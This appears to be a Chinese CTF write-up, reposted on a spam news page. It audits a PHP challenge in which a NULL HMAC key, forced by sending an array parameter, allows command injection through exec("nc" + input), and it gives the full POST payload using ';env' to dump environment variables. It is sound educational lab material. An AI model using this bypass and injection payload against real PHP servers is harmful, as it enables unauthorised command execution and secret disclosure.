当前位置: 首页 > news >正文

广州网站建设支付百度seo优化方案

news 2025/7/25 11:22:05
广州网站建设支付,百度seo优化方案,开发网站的项目背景描述,做视频的素材什么网站好知识点:数组加密绕过 进入页面熟悉的web三部曲(url地址,web源代码,web目录扫描) url地址没有什么东西去看看源代码. 这有一个mp3文件点一下看看. 在最后面发现了 PHP源码. if(empty($_POST[Black-Cat-Sheriff]) || em…

知识点:数组加密绕过

进入页面熟悉的web三部曲(url地址,web源代码,web目录扫描)

url地址没有什么东西去看看源代码.

这有一个mp3文件点一下看看.

在最后面发现了 PHP源码.


if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){die('谁!竟敢踩我一只耳的尾巴!');
}$clandestine = getenv("clandestine");if(isset($_POST['White-cat-monitor']))$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);if($hh !== $_POST['Black-Cat-Sheriff']){die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}echo exec("nc".$_POST['One-ear']);

开始代码审计.

if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){  die('谁!竟敢踩我一只耳的尾巴!');  
}  
// 检查POST请求中是否包含'Black-Cat-Sheriff'和'One-ear'字段,且它们不为空。  
// 这是一个基本的输入验证,但不足以防止所有类型的攻击。  $clandestine = getenv("clandestine");  
// 从环境变量中获取名为'clandestine'的值,这通常用于存储敏感信息,如密钥。  
// 但从环境变量中直接读取密钥可能不安全,因为它可能暴露给不应访问它的进程。  if(isset($_POST['White-cat-monitor']))  $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);  
// 如果POST请求中包含'White-cat-monitor',则使用其值对'clandestine'进行HMAC SHA256哈希处理。  
// 这可能导致'clandestine'的值被意外修改,这可能不是预期的行为。  $hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);  
// 使用'clandestine'作为密钥,对'One-ear'的值进行HMAC SHA256哈希处理。  
// 这可能用于验证'One-ear'的值,但依赖于之前'clandestine'的值是否已被修改。  if($hh !== $_POST['Black-Cat-Sheriff']){  die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');  
}  
// 验证'Black-Cat-Sheriff'的值是否与预期的哈希值匹配。  
// 如果不匹配,则输出一条消息并终止脚本。  echo exec("nc".$_POST['One-ear']); // 危险!  
// 这里存在严重的安全问题!  
// 使用exec函数执行以'nc'(Netcat)开头的命令,并将'One-ear'的值附加到命令中。  
// 这允许攻击者通过控制'One-ear'的值来执行任意命令,这是典型的命令注入漏洞。  
// 攻击者可以利用这个漏洞来完全控制服务器。

意思是我们要保证Black-Cat-Sheriff 和 One-ear 两个参数的POST值存在的同时Black-Cat-Sheriff的值要等于One-ear经过sha256加密后的值($hh),最后通过exec这个危险函数来获取flag.

知识点:当数组进行sha256加密时,返回总为NULL.

        示例:

<?php
var_dump(hash_hmac('sha256', array(0), 'Unknown_key'));?>结果为:NULL

如果我们想要保证hh的value等于Black-Cat-Sheriff的value,那么我们就需要控制这两个参数的value,因为$clandestine=getenv("clandestine");,我们无法知道它(第一次加密)的环境变量的value,但由于我们知道当数组进行sha256加密时,返回总为NULL,我们就可以控制$clandestine(第二次加密)这个key的value=NULL从而控制hh的value.

话不多说开始注入.

利用下面这exp求出Black-Cat-Sheriff的value

<?php
var_dump(hash_hmac('sha256', ";env", NULL));
?>result:afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b
White-cat-monitor[]=1&Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env

至于为什么 用的是;env,而不是什么cat flag,是因为flag文件里的flag值时假的,他的flag值在环境变量里,同时 ; 是为了不被前面的nc影响.

得到flag游戏结束~ 

http://www.shuangfujiaoyu.com/news/8316.html

相关文章:

  • 网站备案icp备案互动营销案例都有哪些
  • 昆明做凡科网站seo优化一般包括
  • 如何做php网站aso推广
  • 高端工作网站多合一seo插件破解版
  • 合肥环保公司网站建设厦门seo大佬
  • 百度公司做网站网站宣传费用
  • 本地唐山网站建设上海seo优化bwyseo
  • 长沙新媒体公司排名宁波seo深度优化平台有哪些
  • wordpress mac下载文件seo优化搜索推广
  • 教育部学校建设规划中心网站成都网站搭建优化推广
  • 无锡网站制作公司哪家好公司推广发帖网站怎么做
  • 可以做单的猎头网站百度浏览器极速版
  • 欧美风格企业网站私域流量和裂变营销
  • 建个购物网站要多少钱微博指数查询入口
  • 网站布局设计创意企业推广网站有哪些
  • 名字做头诗的网站常见的网络营销方法
  • 网站 攻击 刷流量竞价排名的服务模式是
  • 精选聊城做网站的公司公司网站
  • 桂林北站改造seo岗位工资
  • 恢复正常百度关键词整站优化
  • 石家庄站在哪个区google关键词搜索量
  • 在服务器网站上做跳转页面跳转页面黑帽seo
  • 深圳代做网站网店运营入门基础知识
  • 昆明微网站app推广渠道商
  • 摄影网站建设可以进入任何网站的浏览器
  • 广州企业网站开发手机端竞价恶意点击能防止吗
  • 电商模式有哪几种seo网站优化培训公司
  • 大连品牌网站建设公司如何进行搜索引擎优化?
  • 山西网站建设开发山东服务好的seo
  • 做网站推广弊端批量优化网站软件